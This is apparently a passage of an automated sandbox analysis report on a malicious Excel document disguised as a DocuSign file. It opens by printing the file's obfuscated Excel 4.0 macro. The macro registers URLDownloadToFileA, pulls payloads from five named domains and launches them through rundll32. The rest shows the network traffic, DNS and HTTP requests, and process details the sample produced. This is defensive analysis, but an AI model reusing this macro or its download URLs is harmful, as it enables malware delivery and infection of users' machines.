                  ,,,Server,,,,,,,,,,,,,,,,=NOW(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(D129,DocuSign!T26)",,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(A130*1000000000000000,B133)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""HVFHGHFHDHGFHGDFGBJHDuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""KJNFSJGBRYVBYGVRYWGBRBRBownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCCBB"",""BIOLAFE"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=BIOLAFE(0,T137&B138&B133&D145&D146&D147&D148,D141,0,0)",parama-college.id/yxpmmmg/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B139&B133&D145&D146&D147&D148,D141&""1"",0,0)",raivens.com/zdmqwymhhza/,,"=RIGHT(""SDFJKTRESDCVBNMFDTHEWTTHDSTJndll32"",6)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B140&B133&D145&D146&D147&D148,D141&""2"",0,0)",sportsmarquee.com/hmffuzbolyio/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B141&B133&D145&D146&D147&D148,D141&""3"",0,0)",erp.demosoftware.biz/focahjqevd/,,"=RIGHT(""NBNDBFEVBVRESVGHRVGHVRFVGHRTRUHGR..\KLSD.ggsso"",13)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B142&B133&D145&D146&D147&D148,D141&""4"",0,0)",jayshreewoods.com/gvazzbwlvyk/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,d,,,,,,,,,,,,,,,,,,,a,,,,,,,,,,,,,,,,,,,t,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,
                  "=RIGHT(""dfrgbrd4567w547547w7b,DllRegister"",12)&T26""=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))""=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""1""&T19,41))""=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""2""&T19,41))""=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""3""&T19,41))""=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""4""&T19,41))"=HALT()

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Feb 23, 2021 16:16:19.808659077 CET | 49165 | 80 | 192.168.2.22 | 203.142.76.236
                  Feb 23, 2021 16:16:20.068115950 CET | 80 | 49165 | 203.142.76.236 | 192.168.2.22
                  Feb 23, 2021 16:16:20.068427086 CET | 49165 | 80 | 192.168.2.22 | 203.142.76.236
                  Feb 23, 2021 16:16:20.069920063 CET | 49165 | 80 | 192.168.2.22 | 203.142.76.236
                  Feb 23, 2021 16:16:20.326196909 CET | 80 | 49165 | 203.142.76.236 | 192.168.2.22
                  Feb 23, 2021 16:16:20.853996038 CET | 80 | 49165 | 203.142.76.236 | 192.168.2.22
                  Feb 23, 2021 16:16:20.854298115 CET | 49165 | 80 | 192.168.2.22 | 203.142.76.236
                  Feb 23, 2021 16:16:20.858316898 CET | 80 | 49165 | 203.142.76.236 | 192.168.2.22
                  Feb 23, 2021 16:16:20.858437061 CET | 49165 | 80 | 192.168.2.22 | 203.142.76.236
                  Feb 23, 2021 16:16:20.944479942 CET | 49166 | 80 | 192.168.2.22 | 159.89.174.35
                  Feb 23, 2021 16:16:21.121695995 CET | 80 | 49166 | 159.89.174.35 | 192.168.2.22
                  Feb 23, 2021 16:16:21.121815920 CET | 49166 | 80 | 192.168.2.22 | 159.89.174.35
                  Feb 23, 2021 16:16:21.123222113 CET | 49166 | 80 | 192.168.2.22 | 159.89.174.35
                  Feb 23, 2021 16:16:21.301657915 CET | 80 | 49166 | 159.89.174.35 | 192.168.2.22
                  Feb 23, 2021 16:16:21.301707029 CET | 80 | 49166 | 159.89.174.35 | 192.168.2.22
                  Feb 23, 2021 16:16:21.301872015 CET | 49166 | 80 | 192.168.2.22 | 159.89.174.35
                  Feb 23, 2021 16:16:21.319463968 CET | 49167 | 443 | 192.168.2.22 | 159.89.174.35
                  Feb 23, 2021 16:16:21.494048119 CET | 443 | 49167 | 159.89.174.35 | 192.168.2.22
                  Feb 23, 2021 16:16:21.494425058 CET | 49167 | 443 | 192.168.2.22 | 159.89.174.35
                  Feb 23, 2021 16:16:21.511601925 CET | 49167 | 443 | 192.168.2.22 | 159.89.174.35
                  Feb 23, 2021 16:16:21.686116934 CET | 443 | 49167 | 159.89.174.35 | 192.168.2.22
                  Feb 23, 2021 16:16:21.687419891 CET | 443 | 49167 | 159.89.174.35 | 192.168.2.22
                  Feb 23, 2021 16:16:21.687463999 CET | 443 | 49167 | 159.89.174.35 | 192.168.2.22
                  Feb 23, 2021 16:16:21.687488079 CET | 443 | 49167 | 159.89.174.35 | 192.168.2.22
                  Feb 23, 2021 16:16:21.687757015 CET | 49167 | 443 | 192.168.2.22 | 159.89.174.35
                  Feb 23, 2021 16:16:21.703984976 CET | 49167 | 443 | 192.168.2.22 | 159.89.174.35
                  Feb 23, 2021 16:16:21.878635883 CET | 443 | 49167 | 159.89.174.35 | 192.168.2.22
                  Feb 23, 2021 16:16:21.878973007 CET | 49167 | 443 | 192.168.2.22 | 159.89.174.35
                  Feb 23, 2021 16:16:23.411834955 CET | 49167 | 443 | 192.168.2.22 | 159.89.174.35
                  Feb 23, 2021 16:16:23.594985008 CET | 443 | 49167 | 159.89.174.35 | 192.168.2.22
                  Feb 23, 2021 16:16:23.595171928 CET | 49167 | 443 | 192.168.2.22 | 159.89.174.35
                  Feb 23, 2021 16:16:23.596002102 CET | 49167 | 443 | 192.168.2.22 | 159.89.174.35
                  Feb 23, 2021 16:16:23.769654036 CET | 49170 | 80 | 192.168.2.22 | 70.32.104.19
                  Feb 23, 2021 16:16:23.772114992 CET | 443 | 49167 | 159.89.174.35 | 192.168.2.22
                  Feb 23, 2021 16:16:23.772226095 CET | 49167 | 443 | 192.168.2.22 | 159.89.174.35
                  Feb 23, 2021 16:16:23.906764984 CET | 80 | 49170 | 70.32.104.19 | 192.168.2.22
                  Feb 23, 2021 16:16:23.906908989 CET | 49170 | 80 | 192.168.2.22 | 70.32.104.19
                  Feb 23, 2021 16:16:23.907906055 CET | 49170 | 80 | 192.168.2.22 | 70.32.104.19
                  Feb 23, 2021 16:16:24.045454025 CET | 80 | 49170 | 70.32.104.19 | 192.168.2.22
                  Feb 23, 2021 16:16:25.858752012 CET | 80 | 49165 | 203.142.76.236 | 192.168.2.22
                  Feb 23, 2021 16:16:25.859108925 CET | 49165 | 80 | 192.168.2.22 | 203.142.76.236
                  Feb 23, 2021 16:16:55.632601976 CET | 80 | 49170 | 70.32.104.19 | 192.168.2.22
                  Feb 23, 2021 16:16:55.632658005 CET | 80 | 49170 | 70.32.104.19 | 192.168.2.22
                  Feb 23, 2021 16:16:55.632699966 CET | 80 | 49170 | 70.32.104.19 | 192.168.2.22
                  Feb 23, 2021 16:16:55.632740974 CET | 80 | 49170 | 70.32.104.19 | 192.168.2.22
                  Feb 23, 2021 16:16:55.632775068 CET | 49170 | 80 | 192.168.2.22 | 70.32.104.19
                  Feb 23, 2021 16:16:55.632821083 CET | 49170 | 80 | 192.168.2.22 | 70.32.104.19
                  Feb 23, 2021 16:16:55.632838964 CET | 80 | 49170 | 70.32.104.19 | 192.168.2.22
                  Feb 23, 2021 16:16:55.632859945 CET | 49170 | 80 | 192.168.2.22 | 70.32.104.19
                  Feb 23, 2021 16:16:55.632906914 CET | 80 | 49170 | 70.32.104.19 | 192.168.2.22
                  Feb 23, 2021 16:16:55.632926941 CET | 49170 | 80 | 192.168.2.22 | 70.32.104.19
                  Feb 23, 2021 16:16:55.632967949 CET | 80 | 49170 | 70.32.104.19 | 192.168.2.22
                  Feb 23, 2021 16:16:55.632987976 CET | 49170 | 80 | 192.168.2.22 | 70.32.104.19
                  Feb 23, 2021 16:16:55.633044958 CET | 49170 | 80 | 192.168.2.22 | 70.32.104.19
                  Feb 23, 2021 16:16:55.633333921 CET | 80 | 49170 | 70.32.104.19 | 192.168.2.22
                  Feb 23, 2021 16:16:55.633366108 CET | 80 | 49170 | 70.32.104.19 | 192.168.2.22
                  Feb 23, 2021 16:16:55.633418083 CET | 49170 | 80 | 192.168.2.22 | 70.32.104.19
                  Feb 23, 2021 16:16:55.633460999 CET | 49170 | 80 | 192.168.2.22 | 70.32.104.19
                  Feb 23, 2021 16:16:55.641071081 CET | 49170 | 80 | 192.168.2.22 | 70.32.104.19
                  Feb 23, 2021 16:16:55.641134024 CET | 49170 | 80 | 192.168.2.22 | 70.32.104.19
                  Feb 23, 2021 16:16:55.735174894 CET | 49171 | 80 | 192.168.2.22 | 58.96.102.67
                  Feb 23, 2021 16:16:55.859656096 CET | 80 | 49165 | 203.142.76.236 | 192.168.2.22
                  Feb 23, 2021 16:16:56.082077026 CET | 80 | 49171 | 58.96.102.67 | 192.168.2.22
                  Feb 23, 2021 16:16:56.082218885 CET | 49171 | 80 | 192.168.2.22 | 58.96.102.67
                  Feb 23, 2021 16:16:56.083353043 CET | 49171 | 80 | 192.168.2.22 | 58.96.102.67
                  Feb 23, 2021 16:16:56.430135965 CET | 80 | 49171 | 58.96.102.67 | 192.168.2.22
                  Feb 23, 2021 16:16:56.460094929 CET | 80 | 49171 | 58.96.102.67 | 192.168.2.22
                  Feb 23, 2021 16:16:56.460336924 CET | 49171 | 80 | 192.168.2.22 | 58.96.102.67
                  Feb 23, 2021 16:16:56.461956024 CET | 80 | 49171 | 58.96.102.67 | 192.168.2.22
                  Feb 23, 2021 16:16:56.462145090 CET | 49171 | 80 | 192.168.2.22 | 58.96.102.67
                  Feb 23, 2021 16:16:56.542912960 CET | 49172 | 80 | 192.168.2.22 | 13.126.100.34
                  Feb 23, 2021 16:16:56.696842909 CET | 80 | 49172 | 13.126.100.34 | 192.168.2.22
                  Feb 23, 2021 16:16:56.696974993 CET | 49172 | 80 | 192.168.2.22 | 13.126.100.34
                  Feb 23, 2021 16:16:56.698048115 CET | 49172 | 80 | 192.168.2.22 | 13.126.100.34
                  Feb 23, 2021 16:16:56.851855040 CET | 80 | 49172 | 13.126.100.34 | 192.168.2.22
                  Feb 23, 2021 16:16:59.543236017 CET | 80 | 49172 | 13.126.100.34 | 192.168.2.22
                  Feb 23, 2021 16:16:59.543289900 CET | 80 | 49172 | 13.126.100.34 | 192.168.2.22
                  Feb 23, 2021 16:16:59.543473005 CET | 49172 | 80 | 192.168.2.22 | 13.126.100.34
                  Feb 23, 2021 16:16:59.548544884 CET | 49173 | 443 | 192.168.2.22 | 13.126.100.34
                  Feb 23, 2021 16:16:59.702228069 CET | 443 | 49173 | 13.126.100.34 | 192.168.2.22
                  Feb 23, 2021 16:16:59.702377081 CET | 49173 | 443 | 192.168.2.22 | 13.126.100.34
                  Feb 23, 2021 16:16:59.703718901 CET | 49173 | 443 | 192.168.2.22 | 13.126.100.34
                  Feb 23, 2021 16:16:59.857239008 CET | 443 | 49173 | 13.126.100.34 | 192.168.2.22
                  Feb 23, 2021 16:16:59.857697964 CET | 443 | 49173 | 13.126.100.34 | 192.168.2.22
                  Feb 23, 2021 16:16:59.857752085 CET | 443 | 49173 | 13.126.100.34 | 192.168.2.22
                  Feb 23, 2021 16:16:59.857793093 CET | 443 | 49173 | 13.126.100.34 | 192.168.2.22
                  Feb 23, 2021 16:16:59.857822895 CET | 443 | 49173 | 13.126.100.34 | 192.168.2.22
                  Feb 23, 2021 16:16:59.857855082 CET | 49173 | 443 | 192.168.2.22 | 13.126.100.34
                  Feb 23, 2021 16:16:59.857903957 CET | 49173 | 443 | 192.168.2.22 | 13.126.100.34
                  Feb 23, 2021 16:16:59.857911110 CET | 49173 | 443 | 192.168.2.22 | 13.126.100.34
                  Feb 23, 2021 16:16:59.860292912 CET | 443 | 49173 | 13.126.100.34 | 192.168.2.22
                  Feb 23, 2021 16:16:59.860344887 CET | 443 | 49173 | 13.126.100.34 | 192.168.2.22
                  Feb 23, 2021 16:16:59.860416889 CET | 49173 | 443 | 192.168.2.22 | 13.126.100.34
                  Feb 23, 2021 16:16:59.860480070 CET | 49173 | 443 | 192.168.2.22 | 13.126.100.34
                  Feb 23, 2021 16:16:59.876363039 CET | 49173 | 443 | 192.168.2.22 | 13.126.100.34
                  Feb 23, 2021 16:17:00.030158043 CET | 443 | 49173 | 13.126.100.34 | 192.168.2.22
                  Feb 23, 2021 16:17:00.030389071 CET | 49173 | 443 | 192.168.2.22 | 13.126.100.34
                  Feb 23, 2021 16:17:00.076894999 CET | 49173 | 443 | 192.168.2.22 | 13.126.100.34
                  Feb 23, 2021 16:17:00.270075083 CET | 443 | 49173 | 13.126.100.34 | 192.168.2.22
                  Feb 23, 2021 16:17:01.463128090 CET | 80 | 49171 | 58.96.102.67 | 192.168.2.22

                  UDP Packets

                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Feb 23, 2021 16:16:19.624469042 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                  Feb 23, 2021 16:16:19.786175013 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
                  Feb 23, 2021 16:16:20.877873898 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
                  Feb 23, 2021 16:16:20.940587997 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
                  Feb 23, 2021 16:16:22.224231958 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
                  Feb 23, 2021 16:16:22.273478985 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
                  Feb 23, 2021 16:16:22.286020041 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8
                  Feb 23, 2021 16:16:22.337598085 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22
                  Feb 23, 2021 16:16:22.864650965 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8
                  Feb 23, 2021 16:16:22.924740076 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22
                  Feb 23, 2021 16:16:22.934739113 CET | 55627 | 53 | 192.168.2.22 | 8.8.8.8
                  Feb 23, 2021 16:16:22.983563900 CET | 53 | 55627 | 8.8.8.8 | 192.168.2.22
                  Feb 23, 2021 16:16:23.617435932 CET | 56009 | 53 | 192.168.2.22 | 8.8.8.8
                  Feb 23, 2021 16:16:23.765706062 CET | 53 | 56009 | 8.8.8.8 | 192.168.2.22
                  Feb 23, 2021 16:16:55.666337967 CET | 61865 | 53 | 192.168.2.22 | 8.8.8.8
                  Feb 23, 2021 16:16:55.731496096 CET | 53 | 61865 | 8.8.8.8 | 192.168.2.22
                  Feb 23, 2021 16:16:56.479896069 CET | 55171 | 53 | 192.168.2.22 | 8.8.8.8
                  Feb 23, 2021 16:16:56.539371967 CET | 53 | 55171 | 8.8.8.8 | 192.168.2.22

                  DNS Queries

                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                  Feb 23, 2021 16:16:19.624469042 CET | 192.168.2.22 | 8.8.8.8 | 0x78b6 | Standard query (0) | parama-college.id | A (IP address) | IN (0x0001)
                  Feb 23, 2021 16:16:20.877873898 CET | 192.168.2.22 | 8.8.8.8 | 0x46f6 | Standard query (0) | raivens.com | A (IP address) | IN (0x0001)
                  Feb 23, 2021 16:16:23.617435932 CET | 192.168.2.22 | 8.8.8.8 | 0x1be | Standard query (0) | sportsmarquee.com | A (IP address) | IN (0x0001)
                  Feb 23, 2021 16:16:55.666337967 CET | 192.168.2.22 | 8.8.8.8 | 0x7c3e | Standard query (0) | erp.demosoftware.biz | A (IP address) | IN (0x0001)
                  Feb 23, 2021 16:16:56.479896069 CET | 192.168.2.22 | 8.8.8.8 | 0x8464 | Standard query (0) | jayshreewoods.com | A (IP address) | IN (0x0001)

                  DNS Answers

                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                  Feb 23, 2021 16:16:19.786175013 CET | 8.8.8.8 | 192.168.2.22 | 0x78b6 | No error (0) | parama-college.id | | 203.142.76.236 | A (IP address) | IN (0x0001)
                  Feb 23, 2021 16:16:20.940587997 CET | 8.8.8.8 | 192.168.2.22 | 0x46f6 | No error (0) | raivens.com | | 159.89.174.35 | A (IP address) | IN (0x0001)
                  Feb 23, 2021 16:16:23.765706062 CET | 8.8.8.8 | 192.168.2.22 | 0x1be | No error (0) | sportsmarquee.com | | 70.32.104.19 | A (IP address) | IN (0x0001)
                  Feb 23, 2021 16:16:55.731496096 CET | 8.8.8.8 | 192.168.2.22 | 0x7c3e | No error (0) | erp.demosoftware.biz | | 58.96.102.67 | A (IP address) | IN (0x0001)
                  Feb 23, 2021 16:16:56.539371967 CET | 8.8.8.8 | 192.168.2.22 | 0x8464 | No error (0) | jayshreewoods.com | | 13.126.100.34 | A (IP address) | IN (0x0001)

                  HTTP Request Dependency Graph

                  • parama-college.id
                  • raivens.com
                  • sportsmarquee.com
                  • erp.demosoftware.biz
                  • jayshreewoods.com

                  HTTP Packets

                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  0 | 192.168.2.22 | 49165 | 203.142.76.236 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Timestamp | kBytes transferred | Direction | Data
                  Feb 23, 2021 16:16:20.069920063 CET | 0 | OUT | GET /yxpmmmg/44250678185879600000.dat HTTP/1.1
                  Accept: */*
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: parama-college.id
                  Connection: Keep-Alive
                  Feb 23, 2021 16:16:20.853996038 CET | 1 | IN | HTTP/1.1 200 OK
                  Date: Tue, 23 Feb 2021 15:16:20 GMT
                  Server: Apache/2.4.39 (Unix) OpenSSL/1.0.2k-fips
                  X-Powered-By: PHP/7.3.18
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  1 | 192.168.2.22 | 49166 | 159.89.174.35 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Timestamp | kBytes transferred | Direction | Data
                  Feb 23, 2021 16:16:21.123222113 CET | 2 | OUT | GET /zdmqwymhhza/44250678185879600000.dat HTTP/1.1
                  Accept: */*
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: raivens.com
                  Connection: Keep-Alive
                  Feb 23, 2021 16:16:21.301707029 CET | 2 | IN | HTTP/1.1 301 Moved Permanently
                  Server: nginx
                  Date: Tue, 23 Feb 2021 15:16:21 GMT
                  Content-Type: text/html
                  Content-Length: 162
                  Connection: keep-alive
                  Location: https://raivens.com/zdmqwymhhza/44250678185879600000.dat
                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  2 | 192.168.2.22 | 49170 | 70.32.104.19 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Timestamp | kBytes transferred | Direction | Data
                  Feb 23, 2021 16:16:23.907906055 CET | 74 | OUT | GET /hmffuzbolyio/44250678185879600000.dat HTTP/1.1
                  Accept: */*
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: sportsmarquee.com
                  Connection: Keep-Alive
                  Feb 23, 2021 16:16:55.632601976 CET | 76 | IN | HTTP/1.1 404 Not Found
                  Date: Tue, 23 Feb 2021 15:16:23 GMT
                  Server: Apache
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <https://sportsmarquee.com/wp-json/>; rel="https://api.w.org/"
                  Set-Cookie: cxssh_status=off; expires=Thu, 03-Jun-2021 15:16:55 GMT; Max-Age=8640000; path=/
                  Keep-Alive: timeout=5, max=1000
                  Connection: Keep-Alive
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8
                  Data Ascii: 1eb6<!doctype html><html lang="en-US"> <head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>Page not found &#8211; Sports Marquee</title><link rel="stylesheet" href="http://sportsmarquee.com/wp-content/plugins/woocommerce-smart-coupons/assets/css/smart-coupon.min.css?ver=4.1.2"><link rel="stylesheet" href="http://sportsmarquee.com/wp-content/plugins/formidable/css/formidableforms.css?ver=11141612"><link rel="stylesheet" href="http://sportsmarquee.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.3"><link rel="stylesheet" href="http://sportsmarquee.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-style.css?ver=3.6.0"><link rel="stylesheet" href="http://sportsmarquee.com/wp-content/plugin


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  3 | 192.168.2.22 | 49171 | 58.96.102.67 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

                  Timestamp | kBytes transferred | Direction | Data
                  Feb 23, 2021 16:16:56.083353043 CET | 86 | OUT | GET /focahjqevd/44250678185879600000.dat HTTP/1.1
                  Accept: */*
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: erp.demosoftware.biz
                  Connection: Keep-Alive
                  Feb 23, 2021 16:16:56.460094929 CET | 87 | IN | HTTP/1.1 200 OK
                  Date: Tue, 23 Feb 2021 15:10:30 GMT
                  Server: Apache/2.4.39 (Unix) OpenSSL/1.0.2k-fips
                  X-Powered-By: PHP/7.1.33
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Transfer-Encoding: chunked
                  Content-Type: text/html;charset=utf-8


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  4 | 192.168.2.22 | 49172 | 13.126.100.34 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

                  Timestamp | kBytes transferred | Direction | Data
                  Feb 23, 2021 16:16:56.698048115 CET | 87 | OUT | GET /gvazzbwlvyk/44250678185879600000.dat HTTP/1.1
                  Accept: */*
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: jayshreewoods.com
                  Connection: Keep-Alive
                  Feb 23, 2021 16:16:59.543236017 CET | 89 | IN | HTTP/1.1 301 Moved Permanently
                  Date: Tue, 23 Feb 2021 15:16:56 GMT
                  Server: Apache
                  X-Powered-By: PHP/7.3.11
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  X-Redirect-By: WordPress
                  X-Frame-Options: SAMEORIGIN
                  Location: https://jayshreewoods.com/gvazzbwlvyk/44250678185879600000.dat
                  Cache-Control: s-maxage=10
                  Keep-Alive: timeout=2, max=100
                  Connection: Keep-Alive
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8
                  Data Ascii: 3b4<!DOCTYPE html><html><body><div style="position:absolute; left:-6630px"><a href="https://www.insnecklace.com/mothers-day-necklace-for-mothers-day/">mothers day necklace</a><a href="https://www.insnecklace.com/mothers-day-necklace-for-mothers-day/">mother's day necklace</a><a href="https://www.insnecklace.com/mothers-day-necklace-for-mothers-day/">mothers day necklaces</a><a href="https://www.ninisilk.com/collections/silk-satin-pajamas">satin pajamas</a><a href="https://www.ninisilk.com/collections/silk-scarf">silk scarf</a><a href="https://www.bt21fans.com/collections/bts-army-bomb-bts-light-stick">army bomb</a><a href="https://www.bt21fans.com/collections/bts-army-bomb-bts-light-stick">army bomb bts</a><a href="https://www.slipsilks.com/silk-scarf/">silk scarf for hair</a><a href="https://www.slipsilks.com/silk-scarf/">silk hair s


                  HTTPS Packets

                  Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
                  Feb 23, 2021 16:16:21.687463999 CET | 159.89.174.35 | 443 | 192.168.2.22 | 49167 | CN=raivens.com | CN=R3, O=Let's Encrypt, C=US | Sun Feb 21 04:48:51 CET 2021 | Sat May 22 05:48:51 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0 | 7dcce5b76c8b17472d024758970a406b
                  Certificate chain (Subject | Issuer | Not Before | Not After):
                  CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021
                  Feb 23, 2021 16:16:59.860344887 CET | 13.126.100.34 | 443 | 192.168.2.22 | 49173 | CN=jayshreewoods.com | CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB | Wed Dec 30 01:00:00 CET 2020 | Fri Dec 31 00:59:59 CET 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0 | 7dcce5b76c8b17472d024758970a406b
                  Certificate chain (Subject | Issuer | Not Before | Not After):
                  CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB | CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US | Fri Nov 02 01:00:00 CET 2018 | Wed Jan 01 00:59:59 CET 2031
                  CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US | CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB | Tue Mar 12 01:00:00 CET 2019 | Mon Jan 01 00:59:59 CET 2029
                  CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB | Thu Jan 01 01:00:00 CET 2004 | Mon Jan 01 00:59:59 CET 2029

                  Code Manipulations

                  Statistics

                  Behavior

                  System Behavior

                  General

                  Start time:16:16:32
                  Start date:23/02/2021
                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                  Imagebase:0x13ffb0000
                  File size:27641504 bytes
                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

